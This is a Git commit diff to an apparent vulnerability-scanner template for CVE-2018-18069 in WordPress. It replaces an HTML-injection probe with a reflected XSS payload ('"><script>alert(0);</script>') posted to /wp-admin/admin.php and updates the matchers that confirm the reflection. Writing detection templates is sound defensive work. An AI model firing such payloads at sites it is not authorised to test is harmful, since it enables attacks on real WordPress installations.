Update CVE-2018-18069.yaml

patch-1
Prince Chaddha 2021-06-17 22:11:00 +05:30 committed by GitHub
parent 39555505db
commit 36bb1fff95
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 2 additions and 2 deletions

View File

@ -11,9 +11,9 @@ requests:
- method: POST - method: POST
path: path:
- "{{BaseURL}}/wp-admin/admin.php" - "{{BaseURL}}/wp-admin/admin.php"
body: 'icl_post_action=save_theme_localization&locale_file_name_en=EN\"><html xmlns=\"hacked' body: 'icl_post_action=save_theme_localization&locale_file_name_en=EN"><script>alert(0);</script>'
matchers: matchers:
- type: dsl - type: dsl
dsl: dsl:
- 'status_code==302 && contains(set_cookie, "_icl_current_admin_language") && contains(body, "hacked")' - 'contains(tolower(all_headers_2), "text/html") && contains(set_cookie, "_icl_current_admin_language") && contains(body, "\"><script>alert(0);</script>")'